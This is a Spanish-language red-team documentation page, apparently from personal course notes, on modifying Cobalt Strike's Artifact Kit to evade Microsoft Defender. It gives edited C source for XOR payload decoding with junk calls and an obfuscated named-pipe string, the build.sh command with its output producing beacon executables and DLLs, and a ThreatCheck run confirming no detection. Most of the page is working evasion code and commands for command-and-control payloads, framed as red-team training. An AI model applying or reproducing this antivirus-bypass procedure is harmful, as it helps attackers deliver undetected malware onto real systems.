Documentacion
Red Team
Infraestructura
Arsenal Kit

Arsenal Kit

Cobalt Strike utiliza el Artifact Kit para generar sus ejecutables y DLLs. El Artifact Kit es parte del Arsenal Kit, que contiene una colección de kits: un marco de código fuente para crear ejecutables y DLLs que evaden algunos productos antivirus.

Es necesario modificar el codigo patch.c para hacer funcional el AV Bypass ya que constantemente se esta actualizando el Defender para detectar los binarios maliciosos. La forma mas sencilla utilizando Arsenal Kit es modificando las siguientes lineas.

Modificar esta parte del codigo.

/opt/CS491/arsenal-kit/kits/artifact/src-common/patch.c
   /* decode the payload with the key */
   for (int c = 0; c < length; c += 8) {
      for (int i = 0; i < 8 && (c + i) < length; i++) {
          char *y = (char *)ptr + c + i;
          char *r = (char *)buffer + c + i;
  
          // Random operation (assuming it's needed, unchanged)
          GetVersion();
  
          *y = *r ^ key[(c + i) % 8];  // XOR operation with key
      }
  }

Modificar el siguiente archivo.

/opt/CS491/arsenal-kit/kits/artifact/src-common/bypass-pipe.c
void start(HINSTANCE mhandle) {
   /* switched from snprintf... as some A/V product was flagging based on the function *sigh* 
      92, 92, 46, 92, 112, 105, 112, 101, 92 is \\.\pipe\
   
   */
   sprintf(pipename, "%c%c%c%c%c%c%c%c%cdoom\\s", 92, 92, 46, 92, 112, 105, 112, 101, 92);

   /* start our server and our client */

Compilar el artifact.

┌──(root㉿kali)-[/opt/CS491/arsenal-kit/kits/artifact]
└─# ./build.sh pipe VirtualAlloc 310272 5 false false none /opt/CS491/artifacts 
[Artifact kit] [+] You have a x86_64 mingw--I will recompile the artifacts
[Artifact kit] [*] Using allocator: VirtualAlloc
[Artifact kit] [*] Using STAGE size: 310272
[Artifact kit] [*] Using RDLL size: 5K
[Artifact kit] [*] Using system call method: none
[Artifact kit] [+] Artifact Kit: Building artifacts for technique: pipe
[Artifact kit] [*] Recompile artifact32.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32svc.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32big.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32big.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact32svcbig.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64.x64.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64svc.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64big.x64.dll with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64big.exe with src-common/bypass-pipe.c
[Artifact kit] [*] Recompile artifact64svcbig.exe with src-common/bypass-pipe.c
[Artifact kit] [+] The artifacts for the bypass technique 'pipe' are saved in '/opt/CS491/artifacts/pipe'

Verficamos que nuestro artifact no es detectado utilizando ThreatCheck. El binario artifact64svcbig.exe denota que es stageless service executable .

C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f  C:\Payloads\artifacts\pipe\artifact64svcbig.exe
[+] No threat found!
[*] Run time: 0.72s

Por ultimo generamos nuestros beacons y ejecutamos los probamos en un entorno windows.

References

https://training.zeropointsecurity.co.uk/courses/take/red-team-ops/texts/37495050-artifact-kit

Malleable C2Resource Kit